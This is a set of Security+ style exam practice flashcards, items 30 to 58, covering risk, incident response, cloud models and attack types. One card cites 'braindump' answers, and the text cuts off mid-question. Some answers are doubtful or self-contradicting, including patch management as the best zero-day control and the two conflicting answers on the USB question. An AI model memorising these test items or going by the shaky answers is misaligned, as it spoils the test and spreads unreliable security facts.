1
Not at all
2
3
4
5
Perfectly
30
Q

Which of the following would BEST provide a systems administrator with the ability to more efficiently identify systems and manage permissions and policies based on location, role, and service level?

a. Standard naming conventions
b. Domain services
c. Baseline configurations
d. Diagrams

A

b. Domain services

Explanation:

Domain services (such as Active Directory in Windows environments) provide centralized management of network resources, including user accounts, computers, groups, and policies. They allow administrators to implement and enforce security policies, manage permissions, and organize systems based on organizational units (OUs), which can reflect location, role, or service level.

Here’s how the other options compare:

a. Standard naming conventions: While important for consistency and organization, naming conventions alone do not provide the centralized management and policy enforcement capabilities that domain services offer.

c. Baseline configurations: Baseline configurations help ensure that systems meet security and operational standards but do not inherently provide the ability to manage permissions and policies based on location, role, and service level.

d. Diagrams: Diagrams (such as network diagrams or system architecture diagrams) provide visual representations of systems and networks but do not directly facilitate the management of permissions and policies.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
31
Q

Which of the following would detect intrusions at the perimeter of an airport?

a. Signage
b. Fencing
c. Motion sensors
d. Lighting
e. Bollards

A

c. Motion sensors

Explanation:

Motion sensors are designed to detect movement within their range. Placing motion sensors along the perimeter of an airport can help alert security personnel to any unauthorized attempts to breach the perimeter fence or other barriers.

Here’s how the other options compare:

a. Signage: While signage can indicate restricted areas and deter unauthorized access, it does not actively detect intrusions.

b. Fencing: Fencing provides a physical barrier to restrict access but does not detect intrusions on its own.

d. Lighting: Lighting enhances visibility and deters intrusions by making it harder for unauthorized individuals to approach undetected, but it does not detect intrusions in itself.

e. Bollards: Bollards are used to restrict vehicle access and enhance security against vehicular attacks but do not detect intrusions at the perimeter.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
32
Q

A security analyst is concerned about critical vulnerabilities that have been detected on some applications running inside containers. Which of the following is the BEST remediation strategy?

a. Update the base container Image and redeploy the environment.
b. Include the containers in the regular patching schedule for servers.
c. Patch each running container individually and test the application.
d. Update the host in which the containers are running.

A

a. Update the base container image and redeploy the environment.

Explanation:

Updating the base container image: Containers are typically built from base images that include the operating system and necessary dependencies. If critical vulnerabilities are found in these base images, the first step is to update the base image to a version that includes patches for these vulnerabilities.

Redeploy the environment: Once the base image is updated, the affected containers should be rebuilt using the patched base image and redeployed. This ensures that all containers running the vulnerable applications are replaced with new instances based on the updated image.

Here’s why the other options are less optimal:

b. Include the containers in the regular patching schedule for servers: While it's important to have a regular patching schedule for servers and their containers, critical vulnerabilities often require more immediate attention than waiting for the next scheduled patch cycle.

c. Patch each running container individually and test the application: Patching each running container individually can be time-consuming and error-prone. It also may not address vulnerabilities in the base image or underlying dependencies.

d. Update the host in which the containers are running: Updating the host is important for security but does not directly address vulnerabilities within the containers themselves.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
33
Q

An organization has decided to purchase an insurance policy because a risk assessment determined that the cost to remediate the risk is greater than the five- year cost of the insurance policy. The organization is enabling risk:

a. avoidance.
b. acceptance.
c. mitigation.
d. transference.

A

d. Transference

Explanation:

Transference: Transferring risk involves shifting the financial consequences of a risk to another party, typically through mechanisms such as insurance policies. By purchasing insurance, the organization transfers the potential costs of certain risks (such as financial losses due to specific events) to the insurance provider. This allows the organization to mitigate the financial impact of those risks while paying a predictable premium over time.

Here’s how the other options differ:

a. Avoidance: Avoidance involves taking actions to eliminate the risk entirely, such as ceasing certain activities or not pursuing certain projects to avoid potential risks.

b. Acceptance: Acceptance involves acknowledging the existence of a risk and deciding not to take any proactive measures to mitigate or transfer it. The organization is willing to bear the potential consequences of the risk.

c. Mitigation: Mitigation involves taking proactive measures to reduce the likelihood or impact of a risk. It typically involves implementing controls or safeguards to minimize the risk's effect.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
34
Q

A security analyst receives an alert from the company’s SIEM that anomalous activity is coming from a local source IP address of 192.168.34.26. The Chief Information Security Officer asks the analyst to block the originating source. Several days later, another employee opens an internal ticket stating that vulnerability scans are no longer being performed properly. The IP address the employee provides is 192.168.34.26. Which of the following describes this type of alert?

a. True negative
b. True positive
c. False positive
d. False negative

A

c. False positive

Explanation:

False positive: This occurs when a security system incorrectly identifies normal or benign activity as malicious or anomalous. In this case, the SIEM alert incorrectly flagged the legitimate vulnerability scans as anomalous activity, leading the analyst to block the IP address 192.168.34.26. This action resulted in a disruption of normal operations (vulnerability scans not being performed properly), which was an unintended consequence of responding to a false alert.

Here’s how the other options compare:

a. True negative: This would describe a situation where the security system correctly identifies normal activity as benign or not malicious.

b. True positive: This would describe a situation where the security system correctly identifies malicious or anomalous activity as such.

d. False negative: This would describe a situation where the security system fails to detect actual malicious activity, incorrectly identifying it as normal or benign.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
35
Q

A security analyst wants to reference a standard to develop a risk management program. Which of the following is the BEST source for the analyst to use?

a. SSAE SOC 2
b. ISO 31000
c. NIST CSF
d. GDPR

A

b. ISO 31000

ISO 31000 is an international standard that provides guidelines and principles for risk management. It offers a comprehensive framework that organizations can adapt to develop their risk management processes, including risk assessment, risk treatment, and risk communication.

Here’s why ISO 31000 is a strong choice:

Comprehensive framework: ISO 31000 provides a systematic approach to risk management that can be applied broadly across different types of risks and organizations.

Internationally recognized: It is widely recognized and used globally, making it easier to communicate and align risk management practices across borders and industries.

Flexibility: ISO 31000 is adaptable to various organizational contexts and can be integrated with other standards and frameworks.

While the other options also play important roles in security and privacy management, they are more specific to certain areas:

a. SSAE SOC 2: Focuses on controls relevant to security, availability, processing integrity, confidentiality, and privacy, primarily for service organizations.

c. NIST CSF (Cybersecurity Framework): Developed by NIST, it focuses specifically on improving cybersecurity risk management for critical infrastructure sectors in the United States.

d. GDPR (General Data Protection Regulation): Focuses on data protection and privacy for individuals within the European Union and European Economic Area.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
36
Q

The Chief Information Security Officer (CISO) requested a report on potential areas of improvement following a security incident. Which of the following incident response processes is the CISO requesting?

a. Lessons learned
b. Preparation
c. Detection
d. Containment
e. Root cause analysis

A

a. Lessons learned

Explanation:

Lessons learned: This process involves reviewing the incident response to identify strengths and weaknesses in the organization's response capabilities. It focuses on understanding what went well, what could have been improved, and recommendations for enhancing incident response procedures in the future.

Here’s how the other options relate to incident response processes:

b. Preparation: Refers to activities and measures taken before an incident occurs to enhance readiness, such as developing incident response plans and conducting training.

c. Detection: Involves identifying and confirming that an incident has occurred or is in progress, often through monitoring and analysis of security alerts.

d. Containment: Involves actions taken to limit the impact and spread of an incident once detected, aiming to prevent further damage or exposure.

e. Root cause analysis: Focuses on determining the underlying cause or causes of an incident to prevent recurrence.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
37
Q

A company is providing security awareness training regarding the importance of not forwarding social media messages from unverified sources. Which of the following risks would this training help to prevent?

a. Hoaxes
b. SPIMs
c. Identity fraud
d. Credential harvesting

A

a. Hoaxes

Explanation:

Hoaxes: These are false messages or information spread with the intention to deceive or mislead recipients. They often propagate through social media platforms and messaging apps, relying on users forwarding them without verification. Hoaxes can cause confusion, panic, or unnecessary concern among users.

Here’s how the other options relate:

b. SPIMs (Spam over Instant Messaging): Refers to unsolicited messages sent over instant messaging platforms. While related to unwanted messages, SPIM typically involves spam rather than hoaxes.

c. Identity fraud: Involves the theft of personal information to impersonate someone else for financial gain or other malicious purposes. While forwarding messages could potentially contribute to identity fraud indirectly (e.g., phishing attacks), it's not the primary risk addressed by avoiding forwarding hoaxes.

d. Credential harvesting: Involves malicious attempts to obtain usernames, passwords, or other sensitive information from users. While forwarding messages could be a vector for spreading phishing attacks aimed at credential harvesting, it's not directly related to the act of forwarding hoaxes from unverified sources.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
38
Q

A security analyst is receiving numerous alerts reporting that the response time of an internet-facing application has been degraded. However, the internal network performance was not degraded. Which of the following MOST likely explains this behavior?

a. DNS poisoning
b. MAC flooding
c. DDoS attack
d. ARP poisoning

A

c. DDoS attack

Explanation:

DDoS attack (Distributed Denial of Service): This type of attack overwhelms a targeted system (in this case, the internet-facing application) with a flood of traffic or requests from multiple sources, aiming to exhaust its resources and make it inaccessible to legitimate users. DDoS attacks can cause significant degradation in the performance and availability of internet-facing services without necessarily impacting the internal network, which operates separately and may have different levels of resilience or protection.

Here’s how the other options compare:

a. DNS poisoning: Typically affects DNS resolution, redirecting users to malicious or incorrect IP addresses. It does not directly cause performance degradation in an application.

b. MAC flooding: This attack floods the switch with packets, potentially causing it to enter into a fail-open mode, but it typically affects network devices rather than specific applications.

d. ARP poisoning: Involves manipulation of ARP (Address Resolution Protocol) cache entries to associate a malicious MAC address with an IP address, leading to traffic redirection. While it can cause network issues, it is not typically associated with application-specific performance degradation.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
39
Q

Which of the following will increase cryptographic security?

a. High data entropy
b. Algorithms that require less computing power
c. Longer key longevity
d. Hashing

A

a. High data entropy

Explanation:

High data entropy: Entropy in this context refers to randomness or unpredictability of data. Higher data entropy means that the data contains more randomness, making it harder for attackers to predict or analyze. Cryptographic algorithms rely on high entropy to ensure that encrypted data is secure and resistant to brute-force attacks.

Here’s how the other options relate:

b. Algorithms that require less computing power: While efficient algorithms are desirable for performance reasons, cryptographic strength is not solely determined by computational requirements. Strong cryptographic algorithms are designed to withstand attacks regardless of computational power.

c. Longer key longevity: This refers to how long cryptographic keys remain valid or secure before needing to be updated or rotated. While longer key lengths are important for security, longevity itself does not directly increase cryptographic security beyond ensuring keys are not compromised over time.

d. Hashing: Hashing is a cryptographic process that generates a fixed-size output (hash value) from input data. While important for data integrity and authentication, hashing alone does not provide encryption or directly increase cryptographic security in the context of encrypting data.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
40
Q

Which of the following statements BEST describes zero-day exploits?

a. When a zero-day exploit is discovered, the system cannot be protected by any means.
b. Zero-day exploits have their own scoring category in CVSS.
c. A zero-day exploit is initially undetectable, and no patch for it exists.
d. Discovering zero-day exploits is always performed via bug bounty programs.

A

c. A zero-day exploit is initially undetectable, and no patch for it exists.

Explanation:

Undetectable and no patch: A zero-day exploit refers to a vulnerability in software or hardware that is unknown to the vendor and for which no patch or fix is available. It is called "zero-day" because it occurs on the same day that the vulnerability is discovered by attackers, meaning the developers have zero days to fix it before it can potentially be exploited.

Here’s why the other options are less accurate:

a. When a zero-day exploit is discovered, the system cannot be protected by any means: While zero-day exploits are initially unknown and pose a significant risk, security measures such as intrusion detection systems and behavior analysis can sometimes mitigate their impact even before a patch is available.

b. Zero-day exploits have their own scoring category in CVSS: While CVSS (Common Vulnerability Scoring System) includes metrics for assessing the severity of vulnerabilities, including those that are zero-day, the scoring itself is not specific to zero-day exploits as a category.

d. Discovering zero-day exploits is always performed via bug bounty programs: Zero-day exploits can be discovered through various means, including security research, threat intelligence, and unfortunately, by malicious actors. Bug bounty programs are one method to incentivize researchers to responsibly disclose vulnerabilities, including zero-days, but they are not the sole source.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
41
Q

A company wants to restrict emailing of PHI documents. The company is implementing a DLP solution. In order to restrict PHI documents, which of the following should be performed FIRST?

a. Retention
b. Governance
c. Classification
d. Change management

A

c. Classification

Explanation:

Classification: This involves identifying and categorizing data based on its sensitivity and regulatory requirements. In the context of PHI documents, classification helps to distinguish which documents contain PHI and need to be protected. Once classified, appropriate policies and controls can be applied, including restrictions on emailing such documents.

Here’s why the other options are less suitable as the first step:

a. Retention: Refers to policies and practices related to storing and retaining data for a specified period. While retention policies are important, they come after classification and governance in the context of data protection.

b. Governance: Involves establishing policies, procedures, and controls to manage and protect data. Governance frameworks help to ensure that data handling practices align with organizational goals and regulatory requirements. Governance typically builds upon classification to enforce policies effectively.

d. Change management: Involves processes and procedures for managing changes to systems, processes, or policies. While important for implementing DLP solutions, change management is typically part of the broader implementation process after classification and governance are established.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
42
Q

A security analyst is investigating some users who are being redirected to a fake website that resembles www.comptia.org. The following output was found on the naming server of the organization:

Name Type Data
www A 192,168.1.10
server1 A 10.10.10.10
server2 A 10.10.10.11
file A 10.10.10.12

Which of the following attacks has taken place?

a. Domain reputation
b. Domain hijacking
d. Disassociation
d. DNS poisoning

A

d. DNS poisoning

Explanation:

DNS poisoning: Also known as DNS spoofing or DNS cache poisoning, this attack involves compromising the Domain Name System (DNS) to redirect domain name resolutions to malicious IP addresses. In this scenario:
    The legitimate domain www.comptia.org has its DNS record (www) pointing to an IP address of 192.168.1.10.
    However, users are being redirected to a fake website that resembles www.comptia.org, indicating that the DNS records have been maliciously altered.

This alteration could be achieved through various means, such as compromising the organization's DNS server or using techniques to inject false DNS records (poisoning) into the DNS cache of intermediate DNS servers.

Let’s address why the other options are incorrect:

a. Domain reputation: This term typically refers to the trustworthiness and reliability of a domain in the context of email deliverability and reputation management. It is not directly related to DNS attacks.

b. Domain hijacking: Refers to unauthorized changes made to the registration of a domain name, often to redirect traffic or gain control over the domain. While related to DNS manipulation, it typically involves administrative control rather than DNS record alteration directly.

c. Disassociation: This term does not have a specific security context related to DNS attacks. It generally means the act of disconnecting or separating something.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
43
Q

Which of the following describes the continuous delivery software development methodology?

a. Waterfall
b. Spiral
c. V-shaped
d. Agile

A

d. Agile

Explanation:

Continuous delivery: This methodology focuses on automating and streamlining the software delivery process to enable frequent and reliable releases of software into production. It emphasizes shorter development cycles, continuous integration, and continuous deployment, where software changes are delivered frequently (often daily) and reliably.

Here’s how the other options relate:

a. Waterfall: A traditional software development methodology characterized by sequential phases (requirements, design, implementation, testing, deployment) where each phase must be completed before the next begins. It does not support continuous delivery.

b. Spiral: An iterative software development methodology where development cycles progress through planning, risk analysis, engineering, and evaluation. It focuses on risk management but does not inherently support continuous delivery.

c. V-shaped: Also known as the V-model, it is a sequential software development model where testing is emphasized in parallel with each stage of development. It does not inherently support continuous delivery.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
44
Q

Which of the following is the BEST example of a cost-effective physical control to enforce a USB removable media restriction policy?

a. Putting security/antitamper tape over USB ports, logging the port numbers, and regularly inspecting the ports
b. Implementing a GPO that will restrict access to authorized USB removable media and regularly verifying that it is enforced
c. Placing systems into locked, key-controlled containers with no access to the USB ports
d. Installing an endpoint agent to detect connectivity of USB and removable media

A

(Community A57%, B 31%)

a. Putting security/antitamper tape over USB ports, logging the port numbers, and regularly inspecting the ports
Explanation:

This option involves a physical method that is cost-effective and straightforward to implement. It does not require additional software or complex configuration and provides a clear visual indication if someone has attempted to use a USB port. Regular inspections can ensure compliance with the USB removable media restriction policy.
Why other options may be less suitable:

Implementing a GPO that will restrict access to authorized USB removable media and regularly verifying that it is enforced: While this is an effective software-based control, it is not a physical control. Additionally, managing and verifying GPO enforcement can be time-consuming and may require more resources compared to physical methods.

Placing systems into locked, key-controlled containers with no access to the USB ports: This method is a strong physical control but may not be cost-effective, especially for a large number of systems. It also reduces the accessibility and usability of the systems.

Installing an endpoint agent to detect connectivity of USB and removable media: This option involves a software-based control that can be effective but might not be considered a physical control. It may also involve additional costs for software licenses and management.

Thus, putting security/antitamper tape over USB ports, logging the port numbers, and regularly inspecting the ports is the best example of a cost-effective physical control to enforce a USB removable media restriction policy.

(Braindump) b. Implementing a GPO that will restrict access to authorized USB removable media and regularly verifying that it is enforced

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
45
Q

A company suspects that some corporate accounts were compromised. The number of suspicious logins from locations not recognized by the users is increasing.
Employees who travel need their accounts protected without the risk of blocking legitimate login requests that may be made over new sign-in properties. Which of the following security controls can be implemented?

a. Enforce MFA when an account request reaches a risk threshold.
b. Implement geofencing to only allow access from headquarters.
c. Enforce time-based login requests that align with business hours.
d. Shift the access control scheme to a discretionary access control.

A

a. Enforce MFA when an account request reaches a risk threshold.

Explanation:

Enforcing MFA (Multi-Factor Authentication): By implementing MFA, especially when an account request reaches a risk threshold (such as suspicious login attempts from unrecognized locations), the system adds an additional layer of security beyond just a username and password. This helps verify the identity of the user more securely, even if the credentials have been compromised. Legitimate users, including traveling employees accessing from new locations, can still authenticate using MFA, ensuring security while maintaining usability.

Here’s why the other options may not be as effective:

b. Implement geofencing to only allow access from headquarters: While geofencing restricts access based on geographic location, it can be overly restrictive for legitimate users who may need to access accounts from various locations during travel. It does not dynamically adjust to new sign-in locations and may hinder legitimate access.

c. Enforce time-based login requests that align with business hours: This control limits access based on time of day, which may not be flexible enough for employees who work outside regular business hours or travel across time zones.

d. Shift the access control scheme to a discretionary access control: This refers to a different access control model that grants users discretion over access permissions, which does not directly address the issue of compromised accounts and suspicious logins.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
46
Q

An organization wants to participate in threat intelligence information sharing with peer groups. Which of the following would MOST likely meet the organization’s requirement?

a. Perform OSINT investigations.
b. Subscribe to threat intelligence feeds.
c. Submit RFCs.
d. Implement a TAXII server.

A

d. Implement a TAXII server.

Explanation:

TAXII (Trusted Automated eXchange of Indicator Information): TAXII is a protocol designed to facilitate the sharing of threat intelligence. It enables organizations to exchange cyber threat information in a structured and automated manner. Organizations can publish threat intelligence data to a TAXII server and subscribe to feeds from other organizations or peer groups. This allows for real-time or near-real-time sharing of threat indicators, such as malicious IP addresses, domain names, and malware signatures.

Here’s why the other options are less likely to meet the requirement:

a. Perform OSINT (Open Source Intelligence) investigations: OSINT involves gathering information from publicly available sources. While it can provide valuable threat intelligence, it is not specifically designed for structured information sharing with peer groups.

b. Subscribe to threat intelligence feeds: Subscribing to threat intelligence feeds is beneficial for receiving updated information about threats, but it is a passive approach compared to actively participating in information sharing through a dedicated protocol like TAXII.

c. Submit RFCs (Request for Comments): RFCs are documents that describe new protocols or protocols that need to be updated. They are not directly related to threat intelligence sharing with peer groups.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
47
Q

Which of the following is the MOST effective control against zero-day vulnerabilities?

a. Network segmentation
b. Patch management
c. Intrusion prevention system
d. Multiple vulnerability scanners

A

b. Patch management

Explanation:

Patch management: Zero-day vulnerabilities are security flaws that are unknown to the software vendor and therefore do not have a patch available to fix them. Patch management involves regularly updating and applying patches to software and systems as soon as patches become available. While patch management cannot prevent zero-day vulnerabilities from being exploited initially, it is crucial because once a patch is released for a zero-day vulnerability, applying it promptly can mitigate the risk of exploitation.

Here’s why the other options are less effective against zero-day vulnerabilities:

a. Network segmentation: While network segmentation helps contain and mitigate the impact of security incidents, including those exploiting zero-day vulnerabilities, it does not directly address the vulnerability itself.

c. Intrusion prevention system (IPS): IPS can detect and block known attacks based on signatures or behavioral anomalies but may not detect or prevent zero-day exploits until signatures or detection mechanisms are updated.

d. Multiple vulnerability scanners: While using multiple vulnerability scanners can enhance visibility into potential vulnerabilities, including zero-day vulnerabilities, it relies on the scanners having updated signatures or detection capabilities to identify zero-day exploits, which may not always be the case.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
48
Q

Which of the following is the GREATEST security concern when outsourcing code development to third-party contractors for an internet-facing application?

a. Intellectual property theft
b. Elevated privileges
c. Unknown backdoor
d. Quality assurance

A

c. Unknown backdoor

Explanation:

An unknown backdoor is a significant security risk because it can provide unauthorized access to the application and potentially the entire network. If a third-party contractor inserts a backdoor into the code, it can be exploited by malicious actors to bypass authentication mechanisms, steal data, or execute further attacks. This kind of vulnerability is particularly dangerous because it can go undetected for a long time, compromising the security of the application and its users.

Other Options:

a. Intellectual property theft: While serious, this concern primarily affects the ownership and competitive advantage of the company rather than the immediate security of the application.
b. Elevated privileges: This is a concern, but it can be mitigated through proper access control and monitoring.
d. Quality assurance: Ensuring high-quality code is important, but security risks from poor quality can be managed through thorough testing and code review processes.

Therefore, the possibility of an unknown backdoor being inserted into the code poses the greatest security risk when outsourcing code development for an internet-facing application.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
49
Q

An organization has hired a red team to simulate attacks on its security posture. Which of the following will the blue team do after detecting an IoC?

a. Reimage the impacted workstations.
b. Activate runbooks for incident response.
c. Conduct forensics on the compromised system.
d. Conduct passive reconnaissance to gather information.

A

b. Activate runbooks for incident response.

Explanation:

Activate runbooks for incident response: Upon detecting an IoC, the blue team will initiate predefined procedures outlined in their incident response plan (runbooks). These procedures are designed to handle security incidents effectively, including containing the threat, investigating the scope of the compromise, mitigating further damage, and restoring affected systems.

Here’s why the other options are less likely to be the immediate response:

a. Reimage the impacted workstations: Reimaging workstations may be part of the incident response process, especially if the compromise is severe, but it typically comes after initial containment and investigation steps.

c. Conduct forensics on the compromised system: Forensic analysis is important for understanding how the compromise occurred and gathering evidence for potential legal or compliance purposes. However, it is usually conducted after containing the incident to prevent further damage.

d. Conduct passive reconnaissance to gather information: Passive reconnaissance is typically done as part of proactive security measures or during the initial stages of threat hunting, not immediately after detecting an IoC.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
50
Q

An amusement park is implementing a biometric system that validates customers’ fingerprints to ensure they are not sharing tickets. The park’s owner values customers above all and would prefer customers’ convenience over security. For this reason, which of the following features should the security team prioritize
FIRST?

a. Low FAR
b. Low efficacy
c. Low FRR
d. Low CER

A

c. Low FRR (False Rejection Rate)

Explanation:

False Rejection Rate (FRR): This metric indicates the rate at which the biometric system incorrectly rejects valid attempts by customers. In other words, it measures how often legitimate customers are not recognized by the system, potentially causing inconvenience and frustration. For an amusement park focusing on customer convenience, minimizing the FRR is crucial to ensure that customers can quickly and reliably access the park using their fingerprints without encountering frequent rejections.

Here’s why the other options are not as suitable in this scenario:

a. Low FAR (False Acceptance Rate): While a low FAR is important for security reasons (to prevent unauthorized access), prioritizing it over customer convenience might lead to more stringent authentication requirements, which could increase the likelihood of legitimate customers being falsely accused of sharing tickets.

b. Low efficacy: Efficacy typically refers to the overall effectiveness of the biometric system in correctly identifying users. Prioritizing low efficacy would mean the system is less accurate in general, which is counterproductive for both security and convenience.

d. Low CER (Crossover Error Rate): CER is the point where the FAR and FRR are equal. While CER is an important metric in biometric system evaluation, it doesn't directly address the immediate concern of customer convenience in this context.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
51
Q

Which of the following organizations sets frameworks and controls for optimal security configuration on systems?

a. ISO
b. GDPR
c. PCI DSS
d. NIST

A

d. NIST (National Institute of Standards and Technology)

Explanation:

NIST: NIST is a non-regulatory federal agency within the United States Department of Commerce. It develops and publishes standards, guidelines, and best practices for various areas, including cybersecurity and information security. Specifically, NIST Special Publication 800-53 provides a comprehensive set of security controls for federal information systems and organizations that need to adhere to federal regulations and guidelines.

Here’s a brief overview of the other options:

a. ISO (International Organization for Standardization): ISO publishes various standards, including those related to information security (e.g., ISO/IEC 27001), but it does not specifically focus on setting detailed frameworks and controls for optimal security configuration on systems.

b. GDPR (General Data Protection Regulation): GDPR is a regulation in EU law on data protection and privacy for all individuals within the European Union and the European Economic Area. It primarily focuses on personal data protection and privacy, not on security configuration standards for systems.

c. PCI DSS (Payment Card Industry Data Security Standard): PCI DSS is a set of security standards designed to ensure that all companies that accept, process, store, or transmit credit card information maintain a secure environment. While it includes specific requirements for securing systems that handle payment card information, it does not cover all aspects of general security configuration for systems.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
52
Q

An organization discovered files with proprietary financial data have been deleted. The files have been recovered from backup, but every time the Chief Financial Officer logs in to the file server, the same files are deleted again. No other users are experiencing this issue. Which of the following types of malware is MOST likely causing this behavior?

a. Logic bomb
b. Cryptomalware
c. Spyware
d. Remote access Trojan

A

a. Logic bomb

Explanation:

Logic bomb: A logic bomb is a type of malware that is typically set to execute or trigger upon a specific condition or event. In this case, it appears to trigger whenever the Chief Financial Officer logs in to the file server. The logic bomb could be programmed to delete specific files each time this event occurs, which explains why the files keep getting deleted even after they are restored from backup.

Here’s why the other options are less likely:

b. Cryptomalware: Cryptomalware (or ransomware) typically encrypts files to extort money from victims, rather than simply deleting them repeatedly. It doesn't usually target specific files repeatedly after restoration.

c. Spyware: Spyware is designed to gather information covertly and send it to an external entity. It is not typically associated with behavior where files are deleted upon a specific user's login.

d. Remote access Trojan (RAT): RATs provide unauthorized remote access to a computer system. While they can be used to perform various malicious actions, including file manipulation, the scenario described (specific files being deleted upon the CFO's login) aligns more closely with the characteristics of a logic bomb.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
53
Q

A security analyst has identified malware spreading through the corporate network and has activated the CSIRT. Which of the following should the analyst do NEXT?

a. Review how the malware was introduced to the network.
b. Attempt to quarantine all infected hosts to limit further spread.
c. Create help desk tickets to get infected systems reimaged.
d. Update all endpoint antivirus solutions with the latest updates.

A

b. Attempt to quarantine all infected hosts to limit further spread.

Explanation:

Quarantine infected hosts: This step is crucial to prevent the malware from spreading further within the network. By isolating or quarantining infected hosts, the analyst can contain the impact and prevent the malware from infecting additional systems or accessing sensitive data.

Here’s why the other options are not the immediate next step:

a. Review how the malware was introduced to the network: While investigating the initial infection vector is important for understanding the attack's root cause and preventing future incidents, it is not the immediate action needed to mitigate the current spread of the malware.

c. Create help desk tickets to get infected systems reimaged: Reimaging infected systems is part of the remediation process, but it should follow containment efforts. Reimaging typically requires coordination and verification, which may take time and should not delay containment efforts.

d. Update all endpoint antivirus solutions with the latest updates: Updating antivirus solutions is important for improving detection and prevention capabilities against known threats. However, during an active malware outbreak, containing the spread takes priority over updating antivirus signatures.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
54
Q

During an incident response, an analyst applied rules to all inbound traffic on the border firewall and implemented ACLs on each critical server. Following an investigation, the company realizes it is still vulnerable because outbound traffic is not restricted, and the adversary is able to maintain a presence in the network.
In which of the following stages of the Cyber Kill Chain is the adversary currently operating?

a. Reconnaissance
b. Command and control
c. Actions on objective
d. Exploitation

A

b. Command and control

Explanation:

Command and control (C2): In the Cyber Kill Chain, the command and control phase involves the adversary establishing communication channels and maintaining control over compromised systems within the network. Even though inbound traffic rules and server ACLs were implemented to defend against initial intrusion attempts (which would typically fall under exploitation), the fact that the adversary still maintains a presence suggests they have successfully established control mechanisms to communicate outbound from compromised systems back to their command infrastructure.

Here’s why the other options are not correct in this context:

a. Reconnaissance: Reconnaissance involves gathering information about the target network and identifying potential vulnerabilities or entry points. While reconnaissance precedes exploitation, the scenario describes a situation where the adversary has already breached the network and is actively maintaining control.

c. Actions on objective: Actions on objective involve the adversary achieving their goals, such as exfiltrating data or disrupting operations. While the adversary may eventually progress to this stage, the scenario indicates that they are currently focused on maintaining their presence through command and control.

d. Exploitation: Exploitation involves the initial compromise of systems or networks. While this may have occurred earlier in the attack lifecycle, the current focus is on the ongoing control and persistence within the network, which aligns more closely with the command and control phase.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
55
Q

A recent security breach exploited software vulnerabilities in the firewall and within the network management solution. Which of the following will MOST likely be used to identify when the breach occurred through each device?

a. SIEM correlation dashboards
b. Firewall syslog event logs
c. Network management solution login audit logs
d. Bandwidth monitors and interface sensors

A

a. SIEM correlation dashboards

Explanation:

SIEM (Security Information and Event Management) correlation dashboards: SIEM systems collect and correlate logs from various sources, including firewalls and network management solutions. They provide a centralized platform to analyze and correlate events across the network and security infrastructure. In the context of a security breach that exploited vulnerabilities in these devices, SIEM correlation dashboards can help identify suspicious activities, anomalies, or specific events that indicate the breach.

Here’s why the other options are less likely to be used for identifying when the breach occurred:

b. Firewall syslog event logs: Firewall syslog event logs are useful for monitoring and analyzing firewall activities, such as traffic allowed or denied, but they may not provide comprehensive visibility into broader network management vulnerabilities or correlated events across different devices.

c. Network management solution login audit logs: While login audit logs from the network management solution are important for tracking user access and activities within the management system, they may not directly correlate with the exploitation of vulnerabilities in the firewall or network devices themselves.

d. Bandwidth monitors and interface sensors: Bandwidth monitors and interface sensors primarily monitor network traffic and performance metrics, such as bandwidth utilization and interface status. They are useful for network performance monitoring but typically do not provide the detailed event data needed to identify specific software vulnerabilities being exploited.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
56
Q

Which of the following is the FIRST environment in which proper, secure coding should be practiced?

a. Stage
b. Development
c. Production
d. Test

A

b. Development

Explanation:

Development: Secure coding practices should be integrated into the development phase of software or application lifecycle. This ensures that security considerations are addressed from the beginning of the development process. Developers should follow secure coding guidelines and practices to minimize vulnerabilities and reduce the risk of introducing security flaws into the software.

Here’s why the other options are less suitable:

a. Stage: The stage environment typically comes after development and is used for testing the application in an environment that closely mirrors production. While security testing and validation should occur in stage environments, secure coding practices should ideally be implemented earlier during development.

c. Production: Production environments are where the live application or software is deployed and used by end-users. Secure coding practices should ideally prevent vulnerabilities from reaching production, as addressing security flaws at this stage can be more costly and risky.

d. Test: While testing is crucial for identifying and validating software functionality and security, including security testing (e.g., penetration testing, vulnerability scanning), secure coding should ideally be applied during development to prevent vulnerabilities from being introduced in the first place.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
57
Q

A cloud service provider has created an environment where customers can connect existing local networks to the cloud for additional computing resources and block internal HR applications from reaching the cloud. Which of the following cloud models is being used?

a. Public
b. Community
c. Hybrid
d. Private

A

c. Hybrid

Explanation:

Hybrid cloud: In a hybrid cloud environment, organizations integrate their on-premises infrastructure (local networks in this case) with cloud services, allowing them to extend their capabilities and leverage cloud resources while maintaining control over sensitive data or applications that need to remain on-premises. In this scenario, the organization is selectively choosing which applications (in this case, internal HR applications) are allowed to access the cloud resources.

Here’s why the other options are not correct:

a. Public cloud: A public cloud model involves cloud services provided over the public internet, where resources are shared among multiple customers. It does not typically involve direct integration with on-premises networks or the ability to selectively block specific applications from accessing cloud resources.

b. Community cloud: A community cloud is a cloud infrastructure shared by several organizations with similar computing concerns (e.g., regulatory requirements). It does not inherently involve integration with existing on-premises networks as described in the scenario.

d. Private cloud: A private cloud is dedicated to a single organization and can be located on-premises or off-premises. While it offers more control and security, it does not typically involve the integration of existing local networks with external cloud resources as described in the scenario.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
58
Q

An organization has developed an application that needs a patch to fix a critical vulnerability. In which of the following environments should the patch be deployed LAST?

